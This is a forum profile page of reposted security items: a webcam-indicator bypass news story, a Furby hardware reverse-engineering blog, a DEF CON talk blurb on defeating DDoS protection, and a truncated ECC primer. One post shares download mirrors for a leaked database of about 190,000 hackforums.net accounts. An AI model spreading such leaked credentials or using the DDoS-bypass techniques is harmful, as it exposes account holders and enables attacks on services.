Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Research shows how MacBook Webcams can spy on their users without warning By Ashkan Soltani and Timothy B. Lee December 18 at 2:25 pm The woman was shocked when she received two nude photos of herself by e-mail. The photos had been taken over a period of several months — without her knowledge — by the built-in camera on her laptop. Fortunately, the FBI was able to identify a suspect: her high school classmate, a man named Jared Abrahams. The FBI says it found software on Abrahams’s computer that allowed him to spy remotely on her and numerous other women. Abrahams pleaded guilty to extortion in October. The woman, identified in court papers only as C.W., later identified herself on Twitter as Miss Teen USA Cassidy Wolf. While her case was instant fodder for celebrity gossip sites, it left a serious issue unresolved. Most laptops with built-in cameras have an important privacy feature — a light that is supposed to turn on any time the camera is in use. But Wolf says she never saw the light on her laptop go on. As a result, she had no idea she was under surveillance. That wasn’t supposed to be possible. While controlling a camera remotely has long been a source of concern to privacy advocates, conventional wisdom said there was at least no way to deactivate the warning light. New evidence indicates otherwise. Marcus Thomas, former assistant director of the FBI’s Operational Technology Division in Quantico, said in a recent story in The Washington Post that the FBI has been able to covertly activate a computer’s camera — without triggering the light that lets users know it is recording — for several years. Now research from Johns Hopkins University provides the first public confirmation that it’s possible to do just that, and demonstrates how. While the research focused on MacBook and iMac models released before 2008, the authors say similar techniques could work on more recent computers from a wide variety of vendors. In other words, if a laptop has a built-in camera, it’s possible someone — whether the federal government or a malicious 19 year old — could access it to spy on the user at any time. One laptop, many chips The built-in cameras on Apple computers were designed to prevent this, says Stephen Checkoway, a computer science professor at Johns Hopkins and a co-author of the study. “Apple went to some amount of effort to make sure that the LED would turn on whenever the camera was taking images,” Checkoway says. The 2008-era Apple products they studied had a “hardware interlock” between the camera and the light to ensure that the camera couldn’t turn on without alerting its owner. The cameras Brocker and Checkoway studied. (Matthew Brocker and Stephen Checkoway) But Checkoway and his co-author, Johns Hopkins graduate student Matthew Brocker, were able to get around this security feature. That’s because a modern laptop is actually several different computers in one package. “There’s more than one chip on your computer,” says Charlie Miller, a security expert at Twitter. “There’s a chip in the battery, a chip in the keyboard, a chip in the camera.” MacBooks are designed to prevent software running on the MacBook’s central processing unit (CPU) from activating its iSight camera without turning on the light. But researchers figured out how to reprogram the chip inside the camera, known as a micro-controller, to defeat this security feature. In a paper called “iSeeYou: Disabling the MacBook Webcam Indicator LED,” Brocker and Checkoway describe how to reprogram the iSight camera’s micro-controller to allow the camera and light to be activated independently. That allows the camera to be turned on while the light stays off. Their research is under consideration for an upcoming academic security conference. The researchers also provided us with a copy of their proof-of-concept software. In the video below, we demonstrate how the camera can be activated without triggering the telltale warning light. Attacks that exploit microcontrollers are becoming more common. “People are starting to think about what happens when you can reprogram each of those,” Miller says. For example, he demonstrated an attack last year on the software that controls Apple batteries, which causes the battery to discharge rapidly, potentially leading to a fire or explosion. Another researcher was able to convert the built-in Apple keyboard into spyware using a similar method. According to the researchers, the vulnerability they discovered affects “Apple internal iSight webcams found in earlier-generation Apple products, including the iMac G5 and early Intel-based iMacs, MacBooks, and MacBook Pros until roughly 2008.” While the attack outlined in the paper is limited to these devices, researchers like Charlie Miller suggest that the attack could be applicable to newer systems as well. “There’s no reason you can’t do it -- it’s just a lot of work and resources but it depends on how well [Apple] secured the hardware,” Miller says. Apple did not reply to requests for comment. Brocker and Checkoway write in their report that they contacted the company on July 16. “Apple employees followed up several times but did not inform us of any possible mitigation plans,” the researchers write. RATted out The software used by Abrahams in the Wolf case is known as a Remote Administration Tool, or RAT. This software, which allows someone to control a computer from across the Internet, has legitimate purposes as well as nefarious ones. For example, it can make it easier for a school’s IT staff to administer a classroom full of computers. Indeed, the devices the researchers studied were similar to MacBooks involved in a notorious case in Pennsylvania in 2008. In that incident, administrators at Lower Merion High School outside Philadelphia reportedly captured 56,000 images of students using the RAT installed on school-issued laptops. Students reported seeing a ‘creepy’ green flicker that indicated that the camera was in use. That helped to alert students to the issue, eventually leading to a lawsuit. But more sophisticated remote monitoring tools may already have the capabilities to suppress the warning light, says Morgan Marquis-Boire, a security researcher at the University of Toronto. He says that cheap RATs like the one used in Merion High School may not have the ability to disable the hardware LEDs, but “you would probably expect more sophisticated surveillance offerings which cost hundreds of thousands of euros” to be stealthier. He points to commercial surveillance products such as Hacking Team and FinFisher that are marketed for use by governments. FinFisher is a suite of tools sold by a European firm called the Gamma Group. A company marketing document released by WikiLeaks indicated that Finfisher could be “covertly deployed on the Target Systems” and enable, among other things, “Live Surveillance through Webcam and Microphone.” The Chinese government has also been accused of using RATs for surveillance purposes. A 2009 report from the University of Toronto described a surveillance program called Ghostnet that the Chinese government allegedly used to spy on prominent Tibetans, including the Dalai Lama. The authors reported that “web cameras are being silently triggered, and audio inputs surreptitiously activated,” though it’s not clear whether the Ghostnet software is capable of disabling camera warning lights. Luckily, there’s an easy way for users to protect themselves. “The safest thing to do is to put a piece of tape on your camera,” Miller says. Ashkan Soltani is an independent security researcher and consultant. Sursa: Research shows how MacBook Webcams can spy on their users without warning
  2. Deci ca sugestii: 1. Disable Javascript (temporar) 2. Random user agent 3. Spoof MAC Altceva?
  3. Reverse Engineering a Furby Table of Contents Introduction About the Device Inter-Device Communication Reversing the Android App Reversing the Hardware Dumping the EEPROM Decapping Proprietary Chips SEM Imaging of Decapped Chips Introduction This past semester I’ve been working on a directed study at my university with Prof. Wil Robertson reverse engineering embedded devices. After a couple of months looking at a passport scanner, one of my friends jokingly suggested I hack a Furby, the notoriously annoying toy of late 1990s fame. Everyone laughed, and we all moved on with our lives. However, the joke didn’t stop there. Within two weeks, this same friend said they had a present for me. And that’s how I started reverse engineering a Furby. About the Device A Furby is an evil robotic children’s toy wrapped in colored fur. Besides speaking its own gibberish-like language called Furbish, a variety of sensors and buttons allow it to react to different kinds of stimuli. Since its original debut in 1998, the Furby apparently received a number of upgrades and new features. The specific model I looked at was from 2012, which supported communication between devices, sported LCD eyes, and even came with a mobile app. Inter-Device Communication As mentioned above, one feature of the 2012 version was the toy’s ability to communicate with other Furbys as well as the mobile app. However, after some investigation I realized that it didn’t use Bluetooth, RF, or any other common wireless protocols. Instead, a look at the official Hasbro Furby FAQ told a more interesting story: Q. There is a high pitched tone coming from Furby and/or my iOS device. A. The noise you are hearing is how Furby communicates with the mobile device and other Furbys. Some people may hear it, others will not. Some animals may also hear the noise. Don’t worry, the tone will not cause any harm to people or animals. Digging into this lead, I learned that Furbys in fact perform inter-device communication with an audio protocol that encodes data into bursts of high-pitch frequencies. That is, devices communicate with one another via high-pitch sound waves with a speaker and microphone. #badBIOS anyone? This was easily confirmed by use of the mobile app which emitted a modulated sound similar to the mosquito tone whenever an item or command was sent to the Furby. The toy would also respond with a similar sound which was recorded by the phone’s microphone and decoded by the app. Upon searching, I learned that other individuals had performed a bit of prior work in analyzing this protocol. Notably, the GitHub project Hacksby appears to have successfully reverse engineered the packet specification, developed scripts to encode and decode data, and compiled a fairly complete database of events understood by the Furby. Reversing the Android App Since the open source database of events is not currently complete, I decided to spend a few minutes looking at the Android app to identify how it performed its audio decoding. After grabbing the .apk via APK Downloader, it was simple work to get to the app’s juicy bits: $ unzip -q com.hasbro.furby.apk $ d2j-dex2jar.sh classes.dex dex2jar classes.dex -> classes-dex2jar.jar $ Using jd-gui, I then decompiled classes-dex2jar.jar into a set of .java source files. I skimmed through the source files of a few app features that utilized the communication protocol (e.g., Deli, Pantry, Translator) and noticed a few calls to methods named sendComAirCmd(). Each method accepted an integer as input, which was spliced and passed to objects created from the generalplus.com.GPLib.ComAirWrapper class: private void sendComAirCmd(int paramInt){ Logger.log(Deli.TAG, "sent command: " + paramInt); Integer localInteger1 = Integer.valueOf(paramInt); int i = 0x1F & localInteger1.intValue() >> 5; int j = 32 + (0x1F & localInteger1.intValue()); ComAirWrapper.ComAirCommand[] arrayOfComAirCommand = new ComAirWrapper.ComAirCommand[2]; ComAirWrapper localComAirWrapper1 = this.comairWrapper; localComAirWrapper1.getClass(); arrayOfComAirCommand[0] = new ComAirWrapper.ComAirCommand(localComAirWrapper1, i, 0.5F); ComAirWrapper localComAirWrapper2 = this.comairWrapper; localComAirWrapper2.getClass(); arrayOfComAirCommand[1] = new ComAirWrapper.ComAirCommand(localComAirWrapper2, j, 0.0F); he name generalplus appears to identify the Taiwanese company General Plus, which “engage in the research, development, design, testing and sales of high quality, high value-added consumer integrated circuits (ICs).” I was unable to find any public information about the GPLib/ComAir library. However, a thread on /g/ from 2012 appears to have made some steps towards identifying the General Plus chip, among others. The source code at generalplus/com/GPLib/ComAirWrapper.java defined a number of methods providing wrapper functionality around encoding and decoding data, though none of the functionality itself. Continuing to dig, I found the file libGPLibComAir.so: $ file lib/armeabi/libGPLibComAir.so lib/armeabi/libGPLibComAir.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped Quick analysis on the binary showed that this was likely the code I had been looking for: $ nm -D lib/armeabi/libGPLibComAir.so | grep -i -e encode -e decode -e command0000787d T ComAir_GetCommand00004231 T Java_generalplus_com_GPLib_ComAirWrapper_Decode000045e9 T Java_generalplus_com_GPLib_ComAirWrapper_GenerateComAirCommand00004585 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirDecodeMode000045c9 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirEncodeMode00004561 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirDecodeMode000045a5 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirEncodeMode000041f1 T Java_generalplus_com_GPLib_ComAirWrapper_StartComAirDecode00004211 T Java_generalplus_com_GPLib_ComAirWrapper_StopComAirDecode00005af5 T _Z13DecodeRegCodePhP15tagCustomerInfo000058cd T _Z13EncodeRegCodethPh00004f3d T _ZN12C_ComAirCore12DecodeBufferEPsi00004c41 T _ZN12C_ComAirCore13GetDecodeModeEv00004ec9 T _ZN12C_ComAirCore13GetDecodeSizeEv00004b69 T _ZN12C_ComAirCore13SetDecodeModeE16eAudioDecodeMode000050a1 T _ZN12C_ComAirCore16SetPlaySoundBuffEP19S_ComAirCommand_Tag00004e05 T _ZN12C_ComAirCore6DecodeEPsi00005445 T _ZN15C_ComAirEncoder10SetPinCodeEs00005411 T _ZN15C_ComAirEncoder11GetiDfValueEv0000547d T _ZN15C_ComAirEncoder11PlayCommandEi000053fd T _ZN15C_ComAirEncoder11SetiDfValueEi00005465 T _ZN15C_ComAirEncoder12IsCmdPlayingEv0000588d T _ZN15C_ComAirEncoder13GetComAirDataEPPcRi000053c9 T _ZN15C_ComAirEncoder13GetEncodeModeEv000053b5 T _ZN15C_ComAirEncoder13SetEncodeModeE16eAudioEncodeMode000053ed T _ZN15C_ComAirEncoder14GetCentralFreqEv00005379 T _ZN15C_ComAirEncoder14ReleasePlayersEv000053d9 T _ZN15C_ComAirEncoder14SetCentralFreqEi000056c1 T _ZN15C_ComAirEncoder15GenComAirBufferEiPiPs00005435 T _ZN15C_ComAirEncoder15GetWaveFormTypeEv000054bd T _ZN15C_ComAirEncoder15PlayCommandListEiP20tagComAirCommandList00005421 T _ZN15C_ComAirEncoder15SetWaveFormTypeEi00005645 T _ZN15C_ComAirEncoder17PlayComAirCommandEif00005755 T _ZN15C_ComAirEncoder24FillWavInfoAndPlayBufferEiPsf00005369 T _ZN15C_ComAirEncoder4InitEv000051f9 T _ZN15C_ComAirEncoderC1Ev000050b9 T _ZN15C_ComAirEncoderC2Ev00005351 T _ZN15C_ComAirEncoderD1Ev00005339 T _ZN15C_ComAirEncoderD2Ev I loaded the binary in IDA Pro and quickly confirmed my thought. The method generalplus.com.GPLib.ComAirWrapper.Decode() decompiled to the following function: unsigned int __fastcall Java_generalplus_com_GPLib_ComAirWrapper_Decode(int a1, int a2, int a3){ int v3; // ST0C_4@1 int v4; // ST04_4@1 int v5; // ST1C_4@1 const void *v6; // ST18_4@1 unsigned int v7; // ST14_4@1 v3 = a1; v4 = a3; v5 = _JNIEnv::GetArrayLength(); v6 = (const void *)_JNIEnv::GetShortArrayElements(v3, v4, 0); v7 = C_ComAirCore::DecodeBuffer((int)&unk_10EB0, v6, v5); _JNIEnv::ReleaseShortArrayElements(v3); return v7; } Within C_ComAirCore: DecodeBuffer() resided a looping call to ComAir_DecFrameProc() which appeared to be referencing some table of phase coefficients: int __fastcall ComAir_DecFrameProc(int a1, int a2){ int v2; // r5@1 signed int v3; // r4@1 int v4; // r0@3 int v5; // r3@5 signed int v6; // r2@5 v2 = a1; v3 = 0x40; if ( ComAir_Rate_Mode != 1 ) { v3 = 0x80; if ( ComAir_Rate_Mode == 2 ) v3 = 0x20; } v4 = (a2 << 0xC) / 0x64; if ( v4 > (signed int)&PHASE_COEF[0x157F] ) v4 = (int)&PHASE_COEF[0x157F]; v5 = v2; v6 = 0; do { ++v6; *(_WORD *)v5 = (unsigned int)(*(_WORD *)v5 * v4) >> 0x10; v5 += 2; } while ( v3 > v6 ); ComAirDec(); return ComAir_GetCommand(); } Near the end of the function was a call to the very large function ComAirDec(), which likely was decompiled with the incorrect number of arguments and performed the bulk of the audio decoding process. Data was transformed and parsed, and a number of symbols apparently associated with frequency-shift keying were referenced. Itching to continue onto reverse engineering the hardware, I began disassembling the device. Reversing the Hardware Actually disassembling the Furby itself proved more difficult than expected due to the form factor of the toy and number of hidden screws. Since various tear-downs of the hardware are already available online, let’s just skip ahead to extracting juicy secrets from the device. The heart of the Furby lies in the following two-piece circuit board: Thanks to another friend, I also had access to a second Furby 2012 model, this time the French version. Although the circuit boards of both devices were incredibly similar, differences did exist, most notably in the layout of the right-hand daughterboard. Additionally, the EEPROM chip (U2 on the board) was branded as Shenzen LIZE on the U.S. version, the French version was branded ATMEL: The first feature I noticed about the boards was the fact that a number of chips were hidden by a thick blob of epoxy. This is likely meant to thwart reverse engineers, as many of the important chips on the Furby are actually proprietary and designed (or at least contracted for development) by Hasbro. This is a standard PCB assembly technique known as “chip-on-board” or “direct chip attachment,” though it proves harder to identify the chips due to the lack of markings. However, one may still simply inspect the traces connected to the chip and infer its functionality from there. For now, let’s start with something more accessible and dump the exposed EEPROM. Dumping the EEPROM The EEPROM chip on the French version Furby is fairly standard and may be easily identified by its form and markings: By googling the markings, we find the datasheet and learn that it is a 24Cxx family EEPROM chip manufactured by ATMEL. This particular chip provides 2048 bits of memory (256 bytes), speaks I2C, and offers a write protect pin to prevent accidental data corruption. The chip on the U.S. version Furby has similar specs but is marked L24C02B-SI and manufactured by Shenzen LIZE. Using the same technique as on my Withings WS-30 project, I used a heat gun to desolder the chip from the board. Note that this MUST be done in a well-ventilated area. Intense, direct heat will likely scorch the board and release horrible chemicals into the air. Unlike my Withings WS-30 project, however, I no longer had access to an ISP programmer and would need to wire the EEPROM manually. I chose to use my Arduino Duemilanove since it provides an I2C interface and accompanying libraries for easy development. Referencing the datasheet, we find that there are eight total pins to deal with. Pins 1-3 (A0, A1, A2) are device address input pins and are used to assign a unique identifier to the chip. Since multiple EEPROM chips may be wired in parallel, a method must be used to identify which chip a controller wishes to speak with. By pulling the A0, A1, and A2 pins high or low, a 3-bit number is formed that uniquely identifies the chip. Since we only have one EEPROM, we can simply tie all three to ground. Likewise, pin 4 (GND) is also connected to ground. Pins 5 and 6 (SDA, SCL) designate the data and clock pins on the chip, respectively. These pins are what give “Two Wire Interface” (TWI) its name, as full communication may be achieved with just these two lines. SDA provides bi-directional serial data transfer, while SCL provides a clock signal. Pin 7 (WP) is the write protect pin and provides a means to place the chip in read-only mode. Since we have no intention of writing to the chip (we only want to read the chip without corrupting its contents), we can pull this pin high (5 volts). Note that some chips provide a “negative” WP pin; that is, connecting it to ground will enable write protection and pulling it high will disable it. Pin 8 (VCC) is also connected to the same positive power source. After some time learning the Wire library and looking at example code online, I used the following Arduino sketch to successfully dump 256 bytes of data from the French version Furby EEPROM chip: #include <Wire.h>#define disk1 0x50 // Address of eeprom chip byte i2c_eeprom_read_byte( int deviceaddress, unsigned int eeaddress ) { byte rdata = 0x11; Wire.beginTransmission(deviceaddress); // Wire.write((int)(eeaddress >> 8)); // MSB Wire.write((int)(eeaddress & 0xFF)); // LSB Wire.endTransmission(); Wire.requestFrom(deviceaddress,1); if (Wire.available()) rdata = Wire.read(); return rdata; } void setup(void) { Serial.begin(9600); Wire.begin(); unsigned int i, j; unsigned char b; for ( i = 0; i < 16; i++ ) { for ( j = 0; j < 16; j++ ) { b = i2c_eeprom_read_byte(disk1, (i * 16) + j); if ( (b & 0xf0) == 0 ) Serial.print("0"); Serial.print(b, HEX); Serial.print(" "); } Serial.println(); } } void loop(){} Note that unlike most code examples online, the “MSB” line of code within i2c_eeprom_read_byte() is commented out. Since our EEPROM chip is only 256 bytes large, we are only using 8-bit memory addressing, hence using a single byte. Larger memory capacities require use of larger address spaces (9 bits, 10 bits, so on) which require two bytes to accompany all necessary address bits. Upon running the sketch, we are presented with the following output: 2F 64 00 00 00 00 5A EB 2F 64 00 00 00 00 5A EB 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 02 18 05 00 00 04 00 00 02 18 0F 00 00 00 00 00 18 18 0F 00 00 00 00 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 Unfortunately, without much guidance or further analysis of the hardware (perhaps at runtime), it is difficult to make sense of this data. By watching the contents change over time or in response to specific events, it may be possible to gain a better understanding of these few bytes. Decapping Proprietary Chips With few other interesting chips freely available to probe, I turned my focus to the proprietary chips hidden by epoxy. Having seen a number of online resources showcase the fun that is chip decapping, I had the urge to try it myself. Additionally, the use of corrosive acid might just solve the issue of the epoxy in itself. Luckily, with the assistance and guidance of my Chemistry professor Dr. Geoffrey Davies, I was able to utilize the lab resources of my university and decap chips in a proper and safe manner. First, I isolated the three chips I wanted to decap (henceforth referenced as tiny, medium, and large) by desoldering their individual boards from the main circuit board. Since the large chip was directly connected to the underside of the board, I simply took a pair of sheers and cut around it. Each chip was placed in its own beaker of 70% nitric acid (HNO3) on a hot plate at 68°C. Great care was taken to ensure that absolutely no amount of HNO3 came in contact with skin or was accidentally consumed. The entire experiment took place in a fume hood which ensured that the toxic nitrogen dioxide (NO2) gas produced by the reaction was safely evacuated and not breathed in. Each sample took a different amount of time to fully decompose the epoxy, circuit board, and chip casing depending on its size. Since I was working with a lower concentration nitric acid than professionals typically use (red/white fuming nitric acid is generally preferred), the overall process took between 1-3 hours. “Medium” (left) and “Tiny” (right) After each chip had been fully exposed and any leftover debris removed, I removed the beakers from the hot plate, let cool, and decanted the remaining nitric acid into a waste collection beaker, leaving the decapped chips behind. A small amount of distilled water was then added to each beaker and the entirety of it poured onto filter paper. After rinsing each sample one or two more times with distilled water, the sample was then rinsed with acetone two or three times. The large chip took the longest to finish simply due to the size of the attached circuit board fragment. About 2.5 hours in, the underside of the chip had been exposed, though the epoxy blob had still not been entirely decomposed. At this point, the bonding wires for the chip (guessed to be a microcontroller) were still visible and intact: About thirty minutes later and with the addition of more nitric acid, all three samples were cleaned and ready for imaging: SEM Imaging of Decapped Chips The final step was to take high resolution images of each chip to learn more about its design and identify any potential manufacturer markings. Once again, I leveraged university resources and was able to make use of a Hitachi S-4800 scanning electron microscope (SEM) with great thanks to Dr. William Fowle. Each decapped chip was placed on a double-sided adhesive attached to a sample viewing plate. A few initial experimental SEM images were taken; however a number of artifacts were present that severely affected the image quality. To counter this, a small amount of colloidal graphite paint was added around the edges of each chip to provide a pathway to ground for the electrons. Additionally, the viewing plate was treated in a sputter coater machine where each chip was coated with 4.5nm of palladium to create a more conductive surface. After treatment, the samples were placed back in the SEM and imaged with greater success. Each chip was imaged in pieces, and each individual image was stitched together to form a single large, high resolution picture. The small and large chip overview images were shot at 5.0kV at 150x magnification, while the medium chip overview image was shot at 5.0kV at 30x magnification: Unfortunately, as can be seen in the image above, the medium chip did not appear to have cleaned completely in its nitric acid bath. Although it is believed to be a memory storage device of some sort (by looking at optical images), it is impossible to discern any finer details from the SEM image. A number of interesting features were found during the imaging process. The marking “GHG554? may be clearly seen directly west on the small chip. Additionally, in similar font face, the marking “GFI392? may be seen on the south-east corner of the large chip: Higher zoom images were also taken of generally interesting topology on the chips. For instance, the following two images show what looks like a “cheese grater” feature on both the small and large chips: If you are familiar with of these chips or any their features, feedback would be greatly appreciated. EDIT: According to cpldcpu, thebobfoster, and Thilo, the “cheese grater” structures are likely bond pads. Additional images taken throughout this project are available at: Flickr: mncoppola's Photostream Tremendous thanks go out to the following people for their guidance and donation of time and resources towards this project: Prof. Wil Robertson – College of Computer and Information Science @ NEU Dr. Geoffrey Davies – Dept. of Chemistry & Chemical Biology @ NEU Dr. William Fowle – Nanomaterials Instrumentation Facility @ NEU Molly White Kaylie DeHart Sursa: Reverse Engineering a Furby | Michael Coppola's Blog
  4. Full Disclosure The Internet Dark Age • Removing Governments on-line stranglehold • Disabling NSA/GCHQ major capabilities (BULLRUN / EDGEHILL) • Restoring on-line privacy - immediately by The Adversaries Update 1 - Spread the Word Uncovered – //NONSA//NOGCHQ//NOGOV - CC BY-ND On September 5th 2013, Bruce Schneier, wrote in The Guardian: “The NSA also attacks network devices directly: routers, switches, firewalls, etc. Most of these devices have surveillance capabilities already built in; the trick is to surreptitiously turn them on. This is an especially fruitful avenue of attack; routers are updated less frequently, tend not to have security software installed on them, and are generally ignored as a vulnerability”. “The NSA also devotes considerable resources to attacking endpoint computers. This kind of thing is done by its TAO – Tailored Access Operations – group. TAO has a menu of exploits it can serve up against your computer – whether you're running Windows, Mac OS, Linux, iOS, or something else – and a variety of tricks to get them on to your computer. Your anti-virus software won't detect them, and you'd have trouble finding them even if you knew where to look. These are hacker tools designed by hackers with an essentially unlimited budget. What I took away from reading the Snowden documents was that if the NSA wants in to your computer, it's in. Period”. http://www.theguardian.com/world/2013/sep/05/nsa-how-to-remain-securesurveillance The evidence provided by this Full-Disclosure is the first independent technical verifiable proof that Bruce Schneier's statements are indeed correct. We explain how NSA/GCHQ: • Are Internet wiretapping you • Break into your home network • Perform 'Tailored Access Operations' (TAO) in your home • Steal your encryption keys • Can secretly plant anything they like on your computer • Can secretly steal anything they like from your computer • How to STOP this Computer Network Exploitation Download: http://cryptome.org/2013/12/Full-Disclosure.pdf
  5. Defcon 21 - Kill 'Em All— Ddos Protection Total Annihilation! Description: With the advent of paid DDoS protection in the forms of CleanPipe, CDN / Cloud or whatnot, the sitting ducks have stood up and donned armors... or so they think! We're here to rip apart this false sense of security by dissecting each and every mitigation techniques you can buy today, showing you in clinical details how exactly they work and how they can be defeated. Essentially we developed a 3-fold attack methodology: stay just below red-flag rate threshold, mask our attack traffics inconspicuous, emulate the behavior of a real networking stack with a human operator behind it in order to spoof the correct response to challenges, ??? PROFIT! We will explain all the required look-innocent headers, TCP / HTTP challenge-response handshakes,JS auth bypass, etc. etc. in meticulous details. With that knowledge you too can be a DDoS ninja! Our PoC attack tool "Kill-em-All" will then be introduced as a platform to put what you've learned into practice, empowering you to bypass all DDoS mitigation layers and get straight through to the backend where havoc could be wrought. Oh and for the skeptics among you, we'll be showing testing results against specific products and services. As a battle-hardened veteran in the DDoS battlefield, Tony "MT" Miu has garnered invaluable experiences and secrets of the trade, making him a distinguished thought leader in DDoS mitigation technologies. At Nexusguard, day in day out he deals with high-profile mission-critical clients, architecturing for them full-scale DDoS mitigation solutions where failure is not an option. He has presented at DEF CON 20 and AVTokyo 2012 a talk titled "DDoS Black and White Kungfu Revealed", and at the 6th Annual HTCIA Asia-Pacific Conference a workshop titled "Network Attack Investigation". With "Impossible is Nothing" as his motto, Dr. Lee never fails to impress with his ingenious implementation prowess. With years of SOC experience under his belt, systematic security engineering and process optimization are his specialties. As a testament to his versatility, Dr. Lee has previously presented in conferences across various disciplines including ACM VRCIA, ACM VRST, IEEE ICECS and IEEE ECCTD. For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Kill 'Em All— Ddos Protection Total Annihilation!
  6. Offensive Security Bug Bounty Program
  7. [h=3]hackforums.net - 190.000+ Accounts Leaked! #AntiSec[/h] www.hackforums.net - DOWNLOAD (110MB UNZIPPED) - Mirror1: http://inventati.org/anonhacknews/leak/Hackforums.net%20%28200k%20users%29.sql Mirror2: https://anonfiles.com/file/03e4cac3df6eb30ba9640c00474bc64a Mirror3: http://bayfiles.net/file/11Nrt/8zK5wI/Hackforums.net_%28200k_users%29.zip Enjoy. Posted by AnonHackNews Sursa: AnonHackNews Blog: hackforums.net - 190.000+ Accounts Leaked! #AntiSec
  8. A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography Published on October 24, 2013 05:00AM by Nick Sullivan. Elliptic Curve Cryptography (ECC) is one of the most powerful but least understood types of cryptography in wide use today. At CloudFlare, we make extensive use of ECC to secure everything from our customers' HTTPS connections to how we pass data between our data centers. Fundamentally, we believe it's important to be able to understand the technology behind any security system in order to trust it. To that end, we looked around to find a good, relatively easy-to-understand primer on ECC in order to share with our users. Finding none, we decided to write one ourselves. That is what follows. Be warned: this is a complicated subject and it's not possible to boil down to a pithy blog post. In other words, settle in for a bit of an epic because there's a lot to cover. If you just want the gist, the TL;DR is: ECC is the next generation of public key cryptography and, based on currently understood mathematics, provides a significantly more secure foundation than first generation public key cryptography systems like RSA. If you're worried about ensuring the highest level of security while maintaining performance, ECC makes sense to adopt. If you're interested in the details, read on. The dawn of public key cryptography The history of cryptography can be split into two eras: the classical era and the modern era. The turning point between the two occurred in 1977, when both the RSA algorithm and the Diffie-Hellman key exchange algorithm were introduced. These new algorithms were revolutionary because they represented the first viable cryptographic schemes where security was based on the theory of numbers; it was the first to enable secure communication between two parties without a shared secret. Cryptography went from being about securely transporting secret codebooks around the world to being able to have provably secure communication between any two parties without worrying about someone listening in on the key exchange. Whitfield Diffie and Martin Hellman Modern cryptography is founded on the idea that the key that you use to encrypt your data can be made public while the key that is used to to decrypt your data can be kept private. As such, these systems are known as public key cryptographic systems. The first, and still most widely used of these systems, is known as RSA — named after the initials of the three men who first publicly described the algorithm: Ron Rivest, Adi Shamir and Leonard Adleman. What you need for a public key cryptographic system to work is a set of algorithms that is easy to process in one direction, but difficult to undo. In the case of RSA, the easy algorithm multiplies two prime numbers. If multiplication is the easy algorithm, its difficult pair algorithm is factoring the product of the multiplication into its two component primes. Algorithms that have this characteristic — easy in one direction, hard the other — are known as Trapdoor Functions. Finding a good Trapdoor Function is critical to making a secure public key cryptographic system. Simplistically: the bigger the spread between the difficulty of going one direction in a Trapdoor Function and going the other, the more secure a cryptographic system based on it will be. A toy RSA algorithm The RSA algorithm is the most popular and best understood public key cryptography system. Its security relies on the fact that factoring is slow and multiplication is fast. What follows is a quick walk-through of what a small RSA system looks like and how it works. In general, a public key encryption system has two components, a public key and a private key. Encryption works by taking a message and applying a mathematical operation to it to get a random-looking number. Decryption takes the random looking number and applies a different operation to get back to the original number. Encryption with the public key can only be undone by decrypting with the private key. Computers don't do well with arbitrarily large numbers. We can make sure that the numbers we are dealing with do not get too large by choosing a maximum number and only dealing with numbers less than the maximum. We can treat the numbers like the numbers on an analog clock. Any calculation that results in a number larger than the maximum gets wrapped around to a number in the valid range. In RSA, this maximum value (call it max) is obtained by multiplying two random prime numbers. The public and private keys are two specially chosen numbers that are greater than zero and less than the maximum value, call them pub and priv. To encrypt a number you multiply it by itself pub times, making sure to wrap around when you hit the maximum. To decrypt a message, you multiply it by itself priv times and you get back to the original number. It sounds surprising, but it actually works. This property was a big breakthrough when it was discovered. To create a RSA key pair, first randomly pick the two prime numbers to obtain the maximum (max). Then pick a number to be the public key pub. As long as you know the two prime numbers, you can compute a corresponding private key priv from this public key. This is how factoring relates to breaking RSA — factoring the maximum number into its component primes allows you to compute someone's private key from the public key and decrypt their private messages. Let's make this more concrete with an example. Take the prime numbers 13 and 7, their product gives us our maximum value of 91. Let's take our public encryption key to be the number 5. Then using the fact that we know 7 and 13 are the factors of 91 and applying an algorithm called the Extended Euclidean Algorithm, we get that the private key is the number 29. These parameters (max: 91, pub: 5; priv: 29) define a fully functional RSA system. You can take a number and multiply it by itself 5 times to encrypt it, then take that number and multiply it by itself 29 times and you get the original number back. Let's use these values to encrypt the message "CLOUD". In order to represent a message mathematically we have to turn the letters into numbers. A common representation of the Latin alphabet is UTF-8. Each character corresponds to a number. Under this encoding, CLOUD is 67, 76, 79, 85, 68. Each of these digits are smaller than our maximum of 91, so we can encrypt them individually. Let's start with the first letter. We have to multiply it by itself 5 times to get the encrypted value. 67×67 = 4489 = 30 * *Since 4489 is larger than max, we have to wrap it around. We do that by dividing by 91 and taking the remainder. 4489 = 91×41 + 30 30×67 = 2010 = 8 8×67 = 536 = 81 81×67 = 5427 = 58 This means the encrypted version of 67 is 58. Repeating the process for each of the letters we get that the encrypted message CLOUD becomes: 58, 20, 53, 50, 87 To decrypt this scrambled message, we take each number and multiply it by itself 29 times: 58×58 = 3364 = 88 (remember, we wrap around when the number is greater than max) 88×58 = 5104 = 8 … 9×58 = 522 = 67 Voila, we're back to 67. This works with the rest of the digits, resulting in the original message. The takeaway is that you can take a number, multiply it by itself a number of times to get a random-looking number, then multiply that number by itself a secret number of times to get back to the original number. Not a perfect Trapdoor RSA and 